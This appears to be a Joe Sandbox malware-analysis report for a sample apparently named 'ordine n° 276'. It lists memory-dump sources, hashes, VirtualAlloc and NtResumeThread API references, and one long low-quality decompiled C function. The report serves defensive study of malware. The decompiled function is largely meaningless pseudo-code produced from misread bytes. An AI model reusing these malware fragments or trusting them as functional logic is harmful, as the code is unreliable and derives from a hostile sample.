
Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: da363e89265edefdd7cdbd5324b3883b6580feed7e1ffcdf20f1b6a4a74dd188
Instruction ID: d2507081f52bc35728634f3212d625c0b7a86b949321cdf01a542da6be3940de
Opcode Fuzzy Hash: da363e89265edefdd7cdbd5324b3883b6580feed7e1ffcdf20f1b6a4a74dd188
Instruction Fuzzy Hash: D4F14A62F1A7000B875E94BE99D0966D0C39FDE25023AE63D252EF73A9FD79CC4A114C

Uniqueness

Uniqueness Score: -1.00%

Function 00403F32, Relevance: 2.1, APIs: 1, Instructions: 811
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9567271a124df4539f23ae9b284ed8c9bdaa9fac15b52b8a8d8458ca70ce3585
Instruction ID: a281141c7219228348cb523dea0b9c6ba098b579ca7af2441d2070f389ef6e9e
Opcode Fuzzy Hash: 9567271a124df4539f23ae9b284ed8c9bdaa9fac15b52b8a8d8458ca70ce3585
Instruction Fuzzy Hash: 0B123B62F1A7000B875E94BE98D0966D0C39FDE250269E63D252EF73A9FD79CC4B114C

Uniqueness

Uniqueness Score: -1.00%

Function 00403F94, Relevance: 2.1, APIs: 1, Instructions: 803
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af1fc1c931cf5613fe09c84294f999292d695084eaf9ac635f6a3ab2e5d3d65d
Instruction ID: 49b366ad0a1a660a03c83b16ff0bbba12662ae49f65d738d6ea7deed41805a6f
Opcode Fuzzy Hash: af1fc1c931cf5613fe09c84294f999292d695084eaf9ac635f6a3ab2e5d3d65d
Instruction Fuzzy Hash: A8024B62F197000B875E94BE98D0966D0C39FDE25022AE63D252EF73A9FD79CC4B164C

Uniqueness

Uniqueness Score: -1.00%

Function 00404551, Relevance: 2.0, APIs: 1, Instructions: 730
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de9dc2144c4bcd582eaa49f4af43844db774cc5fc407494de4ce23c84af09e3a
Instruction ID: 2b0294c6708d095b8af1082f930671e56b3da667615389cf93ce7fab0464e942
Opcode Fuzzy Hash: de9dc2144c4bcd582eaa49f4af43844db774cc5fc407494de4ce23c84af09e3a
Instruction Fuzzy Hash: CBD15A62B1A7000B875E94BE99D0967D0C39FDE250239E63D252EF73A9FD79CC4A114C

Uniqueness

Uniqueness Score: -1.00%

Function 00404463, Relevance: 1.9, APIs: 1, Instructions: 674
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cd1e7a784cf82f3e920186ecbba93a4be7f4c4e7d41210711da29916f3ac80b5
Instruction ID: c92f8ed660f9f1aec830b18ae6a57325ed2918e9a5303ea46440dd3a0624abd9
Opcode Fuzzy Hash: cd1e7a784cf82f3e920186ecbba93a4be7f4c4e7d41210711da29916f3ac80b5
Instruction Fuzzy Hash: 2CD14A62B1A7000B875E94BE98D096690C39FDE25063AE63D262DF73A9FD79CC4B114C

Uniqueness

Uniqueness Score: -1.00%

Function 00404365, Relevance: 1.9, APIs: 1, Instructions: 664memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f500372e64cbb2ddf163046cc3bd3a4d5915e0e6670fbfdb6c608db07e924dfa
Instruction ID: 9b14469905326bd112a7f3c8cbe46c653d467087fcc1174f1fb4b2fe9ce3da42
Opcode Fuzzy Hash: f500372e64cbb2ddf163046cc3bd3a4d5915e0e6670fbfdb6c608db07e924dfa
Instruction Fuzzy Hash: BAE14A62F1A7000B875E94BE99D0966D0C39FDE25023AE63D252DF73A9FD79CC4A114C

Uniqueness

Uniqueness Score: -1.00%

Function 00404647, Relevance: 1.8, APIs: 1, Instructions: 561memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 30ba40459a95d60a96de621c857686014abec64c8c39fd0126205540a9a3774d
Instruction ID: c20cc636acbdb067f57b1b0b6ceffe6d8e19b5f25af8446ada72118c30ba1cd8
Opcode Fuzzy Hash: 30ba40459a95d60a96de621c857686014abec64c8c39fd0126205540a9a3774d
Instruction Fuzzy Hash: 5BC15A62B1AB000B875E94BE94D09A7D0C39FDE250239E63D212EF73A9FD79CC4A014C

Uniqueness

Uniqueness Score: -1.00%

Function 00404A2C, Relevance: 1.8, APIs: 1, Instructions: 545memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 86d4e1bfb3b86659fd56721e55b0ebc17ef24b13f1fe164268571919a72fba1b
Instruction ID: e20323254dca737f2b349b1bc363f18904a9e3bd9c077d59616b131cfb4d4591
Opcode Fuzzy Hash: 86d4e1bfb3b86659fd56721e55b0ebc17ef24b13f1fe164268571919a72fba1b
Instruction Fuzzy Hash: E3912862B1AB000B875D94BE89D0AA7D1D39FDE250639E63D211EF33A9FD79CC4A0548

Uniqueness

Uniqueness Score: -1.00%

Function 0040483D, Relevance: 1.8, APIs: 1, Instructions: 532memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 66b3c7e979294559f52489c7930be7e626bcacc9b19b6c2daf510255b58babcc
Instruction ID: e1d6d36e0e3b2ab8c1e3a7d0309b96a03efdac17094e49c87ca916b68f4af836
Opcode Fuzzy Hash: 66b3c7e979294559f52489c7930be7e626bcacc9b19b6c2daf510255b58babcc
Instruction Fuzzy Hash: 65B16B22B1AB000B875E94BE84D09A7D1D39FDE250739E63D652EF73A9FD79CC4A0148

Uniqueness

Uniqueness Score: -1.00%

Function 0040493B, Relevance: 1.8, APIs: 1, Instructions: 506memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 84f14d8ae52e25f9df078d43e04ecd6776e9c10690180559a1ff6d5f84f839a4
Instruction ID: 27090ff0fbb432ceb1f90c5f69d6c249167c7575579ce6803d43393b5e923ee6
Opcode Fuzzy Hash: 84f14d8ae52e25f9df078d43e04ecd6776e9c10690180559a1ff6d5f84f839a4
Instruction Fuzzy Hash: 24A14A22B1AB000B875D94BE99D0A67D1D39FDE250639E63D251EF33A9FD79CC4A014C

Uniqueness

Uniqueness Score: -1.00%

Function 02B954FB, Relevance: 1.5, APIs: 1, Instructions: 14nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 02B95501

Memory Dump Source

Source File: 00000000.00000002.776445742.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_ordine n#U00b0 276.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 35541dffaa76c6eaa2d3a45e54bec6825e1a298f4fdfbb4656f1cfa9db21e69b
Instruction ID: 7115c02d81bd6d4f48c0ea21a04c6cb492d9d881a850a9167070a0740c3d2bdd
Opcode Fuzzy Hash: 35541dffaa76c6eaa2d3a45e54bec6825e1a298f4fdfbb4656f1cfa9db21e69b
Instruction Fuzzy Hash: 6DD0C97414074A9EDE2AAE70C9E43DC3723BF95205BA58569C4129B918D632A889C716

Uniqueness

Uniqueness Score: -1.00%

Function 0040F666, Relevance: 396.5, APIs: 208, Strings: 17, Instructions: 2722
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0040F666(char _a1, signed char _a8, intOrPtr _a27, char _a109, intOrPtr _a110, void* _a762) {
				intOrPtr _v4;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				void* _v36;
				void* _v48;
				void* _v320;
				void* _v328;
				void* _v340;
				void* _v344;
				void* _v352;
				void* _v356;
				void* _v380;
				void* _v384;
				void* _v388;
				void* _v392;
				void* _v428;
				void* _v432;
				void* _v440;
				void* _v444;
				void* _v448;
				void* _v468;
				void* _v472;
				void* _v476;
				void* _v488;
				void* _v496;
				void* _v500;
				void* _v504;
				void* _v512;
				void* _v516;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v536;
				void* _v544;
				void* _v552;
				void* _v560;
				void* _v568;
				void* _v576;
				void* _v584;
				void* _v592;
				void* _v600;
				void* _v608;
				void* _v616;
				void* _v624;
				void* _v632;
				void* _v640;
				void* _v660;
				void* _v664;
				void* _v668;
				void* _v672;
				void* _v676;
				void* _v680;
				void* _v684;
				void* _v688;
				void* _v692;
				void* _v696;
				void* _v708;
				void* _v712;
				void* _v716;
				void* _v720;
				void* _v724;
				void* _v728;
				void* _v732;
				void* _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v756;
				void* _v760;
				void* _v764;
				void* _v900;
				void* _v904;
				void* _v908;
				void* _v932;
				void* _v948;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* _v968;
				void* _v972;
				void* _v976;
				void* _v980;
				void* _v984;
				void* _v988;
				void* _v992;
				void* _v996;
				void* _v1000;
				void* _v1004;
				void* _v1008;
				void* _v1012;
				void* _v1016;
				void* _v1020;
				void* _v1024;
				void* _v1028;
				void* _v1032;
				void* _v1036;
				void* _v1040;
				void* _v1044;
				void* _v1048;
				void* _v1052;
				void* _v1056;
				void* _v1060;
				void* _v1064;
				void* _v1068;
				void* _v1072;
				void* _v1076;
				void* _v1080;
				void* _v1084;
				void* _v1088;
				void* _v1092;
				void* _v1096;
				void* _v1100;
				void* _v1104;
				void* _v1108;
				void* _v1112;
				void* _v1116;
				void* _v1120;
				void* _v1124;
				void* _v1128;
				void* _v1132;
				void* _v1136;
				void* _v1140;
				void* _v1144;
				void* _v1148;
				void* _v1152;
				void* _v1156;
				void* _v1160;
				void* _v1164;
				void* _v1168;
				void* _v1172;
				void* _v1176;
				void* _v1180;
				void* _v1184;
				void* _v1188;
				void* _v1192;
				void* _v1196;
				void* _v1200;
				void* _v1204;
				void* _v1208;
				void* _v1212;
				void* _v1216;
				void* _v1220;
				void* _v1224;
				void* _v1228;
				void* _v1232;
				void* _v1236;
				void* _v1240;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1260;
				void* _v1264;
				void* _v1268;
				void* _v1272;
				void* _v1276;
				void* _v1280;
				void* _v1284;
				void* _v1288;
				void* _v1292;
				void* _v1296;
				void* _v1300;
				void* _v1304;
				void* _v1308;
				void* _v1312;
				void* _v1316;
				void* _v1320;
				void* _v1324;
				void* _v1328;
				void* _v1332;
				void* _v1336;
				void* _v1340;
				void* _v1344;
				void* _v1348;
				void* _t1349;
				void* _t1350;
				void* _t1351;
				void* _t1355;
				void* _t1356;
				signed int _t1363;
				void* _t1926;
				signed int _t1930;
				void* _t1931;
				signed char _t1932;
				signed int _t2081;
				void* _t2085;
				signed int _t2090;
				signed int _t2091;
				signed int _t2098;
				signed int _t2106;
				signed int _t2127;
				intOrPtr _t2138;
				void* _t2139;
				intOrPtr _t2143;
				signed char _t2145;
				intOrPtr _t2150;
				void* _t2151;
				signed int _t2154;
				signed int _t2155;
				void* _t2160;

				_t1350 = _t1349 + 1;
				 *((intOrPtr*)(_t1350 - 0x2e)) =  *((intOrPtr*)(_t1350 - 0x2e)) + _t2081;
				_t1351 = _t1350 + 1;
				 *((intOrPtr*)(_t1351 + 0x63)) =  *((intOrPtr*)(_t1351 + 0x63)) + _t1931;
				while(1) {
					asm("arpl [ecx], ax");
					asm("lock rol byte [eax], cl");
					asm("sbb bl, dl");
					 *((intOrPtr*)(_t1930 + 0x41)) =  *((intOrPtr*)(_t1930 + 0x41)) + _t1931;
					asm("rol byte [eax], cl");
					_t1355 = (_t1351 + 0x00000001 + _t2081 ^ 0x000000d3) + 1;
					 *((intOrPtr*)(_t1355 + 0x63)) =  *((intOrPtr*)(_t1355 + 0x63)) + _t2081;
					_t1932 = _t1931 + 1;
					_t1356 = _t1355 + _t2081;
					asm("rol byte [eax], cl");
					_push(_t1356);
					asm("rol dword [eax], cl");
					if(_t1356 == 0) {
						break;
					}
					_t1931 = _t1932 + 1;
					_t1351 = _t1356 + _t2081;
					asm("rol byte [eax], cl");
					if(_t1351 < 0) {
						continue;
					}
					 *((intOrPtr*)(_t1351 + 0x64)) =  *((intOrPtr*)(_t1351 + 0x64)) + _t1930;
					_t1932 = _t1931 + 1;
					asm("rol byte [eax], cl");
					_t1930 = _t2081;
					 *((intOrPtr*)(_t1930 + 0x41)) =  *((intOrPtr*)(_t1930 + 0x41)) + _t1930;
					asm("rol byte [eax], cl");
					asm("arpl [ecx], ax");
					asm("lock rol byte [eax], cl");
					asm("enter 0x40d3, 0x0");
					asm("rol byte [eax], cl");
					asm("loopne 0xffffffd5");
					_t1926 =  *0x800040d3 + _t2081 + 1;
					 *((intOrPtr*)(_t1926 - 0xfffbe9d)) =  *((intOrPtr*)(_t1926 - 0xfffbe9d)) + _t1932;
					asm("rol byte [eax], cl");
					 *((intOrPtr*)(_t1930 - 0x2d0fffbf)) =  *((intOrPtr*)(_t1930 - 0x2d0fffbf)) + _t1932;
					 *((intOrPtr*)(_t2106 + _t2081 * 8)) =  *((intOrPtr*)(_t2106 + _t2081 * 8)) + _t2081;
					_t1356 = _t1926 + 0xd7;
					 *((intOrPtr*)(_t1356 - 0xfffbe9d)) =  *((intOrPtr*)(_t1356 - 0xfffbe9d)) + _t2081;
					asm("rol byte [eax], cl");
					asm("aam 0x40");
					 *((intOrPtr*)(_t1930 - 0x2d0fffbf)) =  *((intOrPtr*)(_t1930 - 0x2d0fffbf)) + _t2081;
					break;
				}
				asm("rol byte [eax], cl");
				asm("loopne 0xffffffd4");
				 *((intOrPtr*)(_t1356 + 1 - 0xfffbe9d)) =  *((intOrPtr*)(_t1356 + 1 - 0xfffbe9d)) + _t1930;
				asm("rol byte [eax], cl");
				asm("arpl [ecx], ax");
				asm("lock rol byte [eax], cl");
				0xa04137e9();
				asm("arpl [ecx], ax");
				asm("lock rol byte [eax], cl");
				_t1360 = 0xffffffff9c0040d6;
				_t30 = _t1930 + 0x6d6f0041;
				 *_t30 =  *((intOrPtr*)(_t1930 + 0x6d6f0041)) + 0xffffffff9c0040d6;
				if( *_t30 <= 0) {
					L10:
					_t2085 = _t2085 - 1;
					_push(_t2081);
					_push(_t2106);
					_t1932 = _t1932 - 1;
					_t2106 = _t2106 - 1;
					 *_t1360 =  *_t1360 + _t1360;
					asm("a16 popad");
					L11:
					asm("a16 popad");
					if (_t2138 >= 0) goto L12;
					 *_t1360 =  *_t1360 + _t1360;
					_t2139 =  *_t1360;
					_push(_t1930);
					if(_t2139 < 0) {
						L27:
						 *_t1360 =  *_t1360 + _t1360;
						goto L28;
					} else {
						asm("outsd");
						asm("a16 outsb");
						asm("outsd");
						if(_t2139 < 0) {
							L28:
							 *_t1360 =  *_t1360 + _t1360;
							_t2098 =  &_a1;
							_t2091 =  *[gs:edi+ebp*2+0x6d] * 0x72;
							asm("popad");
							asm("popad");
							if(_t2091 == 0) {
								L38:
								asm("a16 jb 0x72");
								L39:
								if(_t2154 < 0) {
									L60:
									_push(_t2091);
									_push(_t2085);
									L61:
									_v24 = _t2106;
									_v20 = 0x401110;
									_v16 = _a8 & 0x00000001;
									_t1363 = _a8;
									_t1360 = _t1363 & 0xfffffffe;
									 *((char*)(_t1932 + 0x45c70845)) =  *((char*)(_t1932 + 0x45c70845)) - 1;
									asm("hlt");
									 *_t1360 =  *_t1360 + _t1360;
									 *_t1360 =  *_t1360 + _t1360;
									_t1360 = _a8;
									 *(_t1930 + 0x875ff00) =  *(_t1930 + 0x875ff00) | _t1932;
									_t1930 = _t1930 + _t1930;
									if(_t1930 != 0) {
										L69:
										 *_t1360 =  *_t1360 + _t1360;
										_v4 = 2;
										L70:
										 *((intOrPtr*)(_t1930 + 0x4163643d)) =  *((intOrPtr*)(_t1930 + 0x4163643d)) + _t1360;
										_a27 = _a27 + _t2081;
									}
									_t1360 =  *((intOrPtr*)(_t1360 + 4))();
									_t1360 = _t1360 + 0xc7;
									asm("cld");
									 *_t1360 =  *_t1360 + _t1360;
									goto L69;
								}
								 *[gs:ebx+0x6b] =  *[gs:ebx+0x6b] + _t2081;
								asm("popad");
								_t2106 =  *(_t2081 + 0x72) * 0x74;
								_t2155 = _t2106;
								if(_t2155 == 0) {
									goto L61;
								}
								if (_t2155 == 0) goto L42;
								L42:
								 *((intOrPtr*)(_t1932 + 0x6c)) =  *((intOrPtr*)(_t1932 + 0x6c)) + _t1360;
								asm("bound esi, [edx+0x65]");
								asm("arpl [eax+0x74], bp");
								L43:
								 *_t1360 =  *_t1360 + _t1360;
								L44:
								 *((intOrPtr*)(_t1360 + 0x65)) =  *((intOrPtr*)(_t1360 + 0x65)) + _t1932;
								asm("outsb");
								asm("arpl [edi+0x74], bp");
								 *[gs:ebx+0x6f] =  *[gs:ebx+0x6f] + _t1360;
							}
							_t56 =  &_a109;
							 *_t56 = _a109 + _t1360;
							_t2150 =  *_t56;
							asm("bound esi, [edx+0x79]");
							asm("outsd");
							if(_t2150 == 0) {
								L56:
								 *_t1360 =  *_t1360 ^ _t1360;
								_push(_t2098);
								L58:
								_t2106 = _t2106 - 0x18;
								_push(0x4013f6);
								_push( *[fs:0x0]);
								 *[fs:0x0] = _t2106;
								L004013F0();
								 *_t1930 =  *_t1930 - _t1930;
								asm("invalid");
								_push(_t1930);
								goto L60;
							}
							asm("outsd");
							if(_t2150 < 0) {
								if(_t2160 != 0) {
									goto L70;
								}
								asm("popad");
								if(_t2160 == 0) {
									goto L70;
								}
								asm("outsd");
								asm("outsb");
								goto L56;
							}
							 *[gs:eax] =  *[gs:eax] + _t1360;
							 *_t1360 =  *_t1360 + _t1360;
							_t2151 =  *_t1360;
							L32:
							_push(_t2106);
							if(_t2151 >= 0) {
								goto L58;
							}
							_push(0x65706f6c);
							L34:
							if(_t2151 < 0) {
								goto L58;
							}
							asm("popad");
							 *((intOrPtr*)(_t1930 + 0x6f)) =  *((intOrPtr*)(_t1930 + 0x6f)) + _t1932;
							L36:
							asm("outsd");
							asm("outsb");
							asm("outsd");
							asm("insd");
							_t2091 =  *(_t1930 + 0x74) * 0x6e697279;
							L37:
							_push(0x6e);
							_t2098 =  *(_t2091 + 0x67) * 0x656e7265;
							_t2154 = _t2098;
							goto L38;
						}
						if(_t2139 < 0) {
							goto L27;
						}
						asm("outsb");
						asm("a16 jb 0x4");
						 *_t1360 =  *_t1360 + _t1360;
						 *((intOrPtr*)(_t2081 + 0x45)) =  *((intOrPtr*)(_t2081 + 0x45)) + _t2081;
						L16:
						_push(_t2106);
						_t2081 = _t2081 + 1;
						_t2106 = _t2106 - 1;
						_t2098 =  &_a1;
						_push(_t2081);
						_t1932 = _t1932 + 1 - 1;
						_t2091 = _t2090 - 1;
						_t2085 = _t2085 + 1;
						_push(_t1930);
						 *_t1360 =  *_t1360 + _t1360;
						 *_t1360 =  *_t1360 + _t1360;
						if( *_t1360 < 0) {
							goto L32;
						}
						L17:
						asm("outsd");
						_push(0x65);
						_t2091 =  *(_t2098 + 0x61 + _t2098 * 2) * 0x67;
						if(_t2091 < 0) {
							goto L34;
						}
						 *[gs:eax] =  *[gs:eax] + _t1360;
						_t2143 =  *[gs:eax];
						if(_t2143 < 0) {
							goto L36;
						}
						asm("insb");
						asm("insb");
						if(_t2143 != 0) {
							goto L37;
						}
						if (_t2143 < 0) goto L21;
						 *_t1360 =  *_t1360 + _t1360;
						_t49 = _t2085 + 0x61;
						 *_t49 =  *((intOrPtr*)(_t2085 + 0x61)) + _t2081;
						asm("a16 outsd");
						asm("outsb");
						asm("insb");
						if( *_t49 >= 0) {
							goto L39;
						} else {
							 *_t1360 =  *_t1360 + _t1360;
							_a110 = _a110 + _t2081;
							 *_t1360 =  *_t1360 + _t1360;
							_t2085 = _t2085 - 1;
							_t2091 =  *(_t1932 + 0x7a + _t2098 * 2) * 0x6465 - 1;
							_t1930 = _t1930 + 1;
							_push(_t2106);
							_t2098 =  &_a1;
							_push(_t1930);
							 *_t1360 =  *_t1360 + _t1360;
							_t1932 = _t1932 - 0xfffffffffffffffe + 1;
							_t2145 = _t1932;
							asm("insb");
							asm("insb");
							asm("outsd");
							if(_t2145 < 0) {
								goto L42;
							}
							if(_t2145 == 0) {
								goto L43;
							}
							if (_t2145 >= 0) goto L25;
							 *_t1360 =  *_t1360 + _t1360;
							asm("popa");
							if( *_t1360 < 0) {
								goto L44;
							} else {
								_t1360 =  *_t1360 * 0x66450000;
								goto L27;
							}
						}
					}
				}
				_t2090 =  *(_t1930 + 0x6c) * 0x65;
				 *0x9c0040d4 =  *0x9c0040d4 + 0xffffffff9c0040d6;
				 *0x9c0040d4 =  *0x9c0040d4 + 0xffffffff9c0040d6;
				asm("bound esi, [edx+0x75]");
				if( *0x9c0040d4 == 0) {
					goto L11;
				}
				asm("insb");
				_t2090 =  *(_t1930 + 0x65) * 0x676e6972;
				asm("gs outsb");
				_t34 = _t1930 + 0x61;
				 *_t34 =  *((intOrPtr*)(_t1930 + 0x61)) + _t2081;
				asm("insd");
				asm("bound esp, [ecx+0x71]");
				if( *_t34 != 0) {
					goto L16;
				}
				 *0x9c0040d4 =  *0x9c0040d4 + 0xffffffff9c0040d6;
				 *0x9c0040d4 =  *0x9c0040d4 + 0xffffffff9c0040d6;
				_t1932 = _t1932 + 1;
				asm("o16 jae 0x6f");
				asm("bound esp, [gs:ebp+0x74]");
				_t1360 = 0xffffffff9c0040d6 ^  *0x9c0040d4;
				 *0x9c0040d4 =  *0x9c0040d4 + _t1360;
				if( *0x9c0040d4 >= 0) {
					goto L17;
				}
				asm("outsb");
				 *0x9c0040d4 =  *0x9c0040d4 + _t1360;
				_t2127 =  *(_t1930 + 0x69) * 0x65726574;
				if (_t2127 >= 0) goto L9;
				_push(_t1930);
				asm("outsb");
				_t2090 =  *0xFFFFFFFF9C004144 * 0x737465;
				 *0x9c0040d4 =  *0x9c0040d4 + _t1360;
				 *((intOrPtr*)(_t1932 + 0x46)) =  *((intOrPtr*)(_t1932 + 0x46)) + _t1360;
				_t2085 = _t2085 + 1;
				_push(_t2081);
				_t2106 = _t2127 - 1;
				_push(_t1930);
				_push(_t1930);
				 *0x9c0040d4 =  *0x9c0040d4 + _t1360;
				_t42 = _t2090 + 0x4f;
				 *_t42 =  *((intOrPtr*)(_t2090 + 0x4f)) + _t1360;
				_t2138 =  *_t42;
				goto L10;
			}

0x0040f666
0x0040f667
